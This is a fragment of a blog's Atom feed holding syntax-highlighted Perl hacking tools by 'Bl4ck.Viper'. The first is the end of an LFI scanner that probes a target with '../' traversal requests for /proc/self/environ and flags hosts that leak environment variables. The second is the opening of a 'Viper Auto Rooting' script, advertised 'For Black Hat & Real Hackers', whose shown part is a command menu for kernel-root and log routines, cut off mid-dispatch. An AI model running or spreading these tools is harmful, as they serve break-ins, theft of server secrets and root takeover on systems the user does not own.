style="color: #339933;"&gt;!~&lt;/span&gt; &lt;span style="color: #009966; font-style: italic;"&gt;/http:\/\//&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt; &lt;span style="color: #009900;"&gt;{&lt;/span&gt; &lt;span style="color: blue;"&gt;$host&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt; &lt;span style="color: red;"&gt;"http://$host"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt; &lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;*-*-*-*-*-* WORKING IN PROGRESS *-*-*-*-*-*&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;&lt;span style="color: blue;"&gt;@env&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;'../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../../../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../../proc/self/environ'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../../../proc/self/environ'&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;foreach&lt;/span&gt; &lt;span style="color: blue;"&gt;$scan_env&lt;/span&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;@env&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;&lt;span style="color: blue;"&gt;$url&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt; &lt;span style="color: blue;"&gt;$host&lt;/span&gt;&lt;span style="color: #339933;"&gt;.&lt;/span&gt;&lt;span style="color: blue;"&gt;$scan_env&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: blue;"&gt;$request&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt; HTTP&lt;span style="color: #339933;"&gt;::&lt;/span&gt;&lt;span style="color: #006600;"&gt;Request&lt;/span&gt;&lt;span style="color: #339933;"&gt;-&amp;gt;&lt;/span&gt;&lt;span style="color: #006600;"&gt;new&lt;/span&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;GET&lt;span style="color: #339933;"&gt;=&amp;gt;&lt;/span&gt;&lt;span style="color: blue;"&gt;$url&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: blue;"&gt;$useragent&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt; LWP&lt;span style="color: #339933;"&gt;::&lt;/span&gt;&lt;span style="color: #006600;"&gt;UserAgent&lt;/span&gt;&lt;span style="color: #339933;"&gt;-&amp;gt;&lt;/span&gt;&lt;span style="color: #006600;"&gt;new&lt;/span&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;&lt;span style="color: blue;"&gt;$response&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt; &lt;span style="color: blue;"&gt;$useragent&lt;/span&gt;&lt;span style="color: #339933;"&gt;-&amp;gt;&lt;/span&gt;&lt;span style="color: #006600;"&gt;request&lt;/span&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$request&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;if&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$response&lt;/span&gt;&lt;span style="color: #339933;"&gt;-&amp;gt;&lt;/span&gt;&lt;span style="color: #006600;"&gt;is_success&lt;/span&gt; &lt;span style="color: #339933;"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span style="color: blue;"&gt;$response&lt;/span&gt;&lt;span style="color: #339933;"&gt;-&amp;gt;&lt;/span&gt;&lt;span style="color: #006600;"&gt;content&lt;/span&gt; &lt;span style="color: #339933;"&gt;=~&lt;/span&gt; &lt;span style="color: #009966; font-style: italic;"&gt;/HTTP_ACCEPT/&lt;/span&gt; &lt;span style="color: #339933;"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span style="color: blue;"&gt;$response&lt;/span&gt;&lt;span style="color: #339933;"&gt;-&amp;gt;&lt;/span&gt;&lt;span style="color: #006600;"&gt;content&lt;/span&gt; &lt;span style="color: #339933;"&gt;=~&lt;/span&gt; &lt;span style="color: #009966; font-style: italic;"&gt;/HTTP_HOST/&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt; &lt;span style="color: #009900;"&gt;{&lt;/span&gt; &lt;span style="color: blue;"&gt;$msg&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt; Vulnerability&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;else&lt;/span&gt; &lt;span style="color: #009900;"&gt;{&lt;/span&gt; &lt;span style="color: blue;"&gt;$msg&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt; &lt;span style="color: red;"&gt;"Not Found"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"$scan_env..........[$msg]&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;# Bl4ck.Viper Turkish Hacker&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;# Copyright 2010 Black Viper&lt;/span&gt;&lt;/pre&gt;&lt;span class="fullpost"&gt;  &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;copyright@2007 saifulfaizan&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23134681-2303358276974205150?l=www.saifulfaizan.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/23134681/posts/default/2303358276974205150'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/23134681/posts/default/2303358276974205150'/><link rel='alternate' type='text/html' href='http://www.saifulfaizan.com/2011/12/viper-lfi-scanner-ver-30.html' title='Viper LFI Scanner Ver. 3.0'/><author><name>x-CODE-shadow</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_MmkIH6WGbYI/R4q6vasF8zI/AAAAAAAAAGY/x1TYR1MoOrE/S220/DSCI0128.JPG'/></author></entry><entry><id>tag:blogger.com,1999:blog-23134681.post-3336378982952708172</id><published>2011-12-21T21:09:00.002+08:00</published><updated>2011-12-21T21:09:55.738+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Perl'/><title type='text'>Viper Auto Rooting</title><content type='html'>&lt;pre class="perl" style="background-attachment: initial; background-clip: initial; background-color: #f9f9f9; background-image: none; background-origin: initial; border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; clear: none; color: seagreen; font-size: 12px; line-height: 1.333; overflow-x: visible; overflow-y: visible; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; white-space: pre-wrap; width: auto;"&gt;&lt;span style="color: #666666; font-style: italic;"&gt;#!/usr/bin/perl&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;#&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;#  ==&amp;gt;&amp;gt; Viper Auto Rooting &amp;lt;&amp;lt;==&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;#&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;#&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;# ---------------------------------------------------------------------------------------------------------------------------&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;# Script : Perl&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;# By : Bl4ck.Viper&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;# From : Azarbycan (Turkish Man)(fardin Allahverdinajhand)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;# Contact : Bl4ck.Viper@Gmail.Com , Bl4ck.Viper@Hotmail.Com , Bl4ck.Viper@Yahoo.Com&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;# Version : 2.0&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;# For Black Hat &amp;amp; Real Hackers&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;# --------------------------------------------------------------------------------------------------------------------------- &lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;# ---------------------------------------------------------------------------------------------------------------------------&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;# For All Version Of Linux , SunOS , MacOS X , FreeBSD&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;# ---------------------------------------------------------------------------------------------------------------------------&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;# &lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;Viper Auto Rooting&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;Version : 2.0&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;------------------------------------&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;Coded By Bl4ck.Viper&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;------------------------------------&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt; For See Commands type [help] :D&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;command&lt;span style="color: #339933;"&gt;:;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;'Viper@Localr00t#:'&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: blue;"&gt;$command&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt; &lt;span style="color: #009999;"&gt;&lt;stdin&gt;&lt;/stdin&gt;&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;if&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$command&lt;/span&gt; &lt;span style="color: #339933;"&gt;=~&lt;/span&gt; &lt;span style="color: #009966; font-style: italic;"&gt;/help/&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; help&lt;br /&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;if&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$command&lt;/span&gt; &lt;span style="color: #339933;"&gt;=~&lt;/span&gt; &lt;span style="color: #009966; font-style: italic;"&gt;/sysline/&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; sysline&lt;br /&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;if&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$command&lt;/span&gt; &lt;span style="color: #339933;"&gt;=~&lt;/span&gt; &lt;span style="color: #009966; font-style: italic;"&gt;/varline/&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; varline&lt;br /&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;if&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$command&lt;/span&gt; &lt;span style="color: #339933;"&gt;=~&lt;/span&gt; &lt;span style="color: #009966; font-style: italic;"&gt;/gccinfo/&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; gccinfo&lt;br /&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;if&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$command&lt;/span&gt; &lt;span style="color: #339933;"&gt;=~&lt;/span&gt; &lt;span style="color: #009966; font-style: italic;"&gt;/sysinfo/&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; sysinfo&lt;br /&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;if&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$command&lt;/span&gt; &lt;span style="color: #339933;"&gt;=~&lt;/span&gt; &lt;span style="color: #009966; font-style: italic;"&gt;/logc/&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; logc&lt;br /&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;if&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$command&lt;/span&gt; &lt;span style="color: #339933;"&gt;=~&lt;/span&gt; &lt;span style="color: #009966; font-style: italic;"&gt;/config/&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; config&lt;br /&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;if&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$command&lt;/span&gt; &lt;span style="color: #339933;"&gt;=~&lt;/span&gt; &lt;span style="color: #009966; font-style: italic;"&gt;/logs/&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; logs&lt;br /&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;if&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$command&lt;/span&gt; &lt;span style="color: #339933;"&gt;=~&lt;/span&gt; &lt;span style="color: #009966; font-style: italic;"&gt;/sysproc/&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; sysproc&lt;br /&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;if&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$command&lt;/span&gt; &lt;span style="color: #339933;"&gt;=~&lt;/span&gt; &lt;span style="color: #009966; font-style: italic;"&gt;/all/&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; all&lt;br /&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;if&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$command&lt;/span&gt; &lt;span style="color: #339933;"&gt;=~&lt;/span&gt; &lt;span style="color: #009966; font-style: italic;"&gt;/2.2.x/&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; local2&lt;br 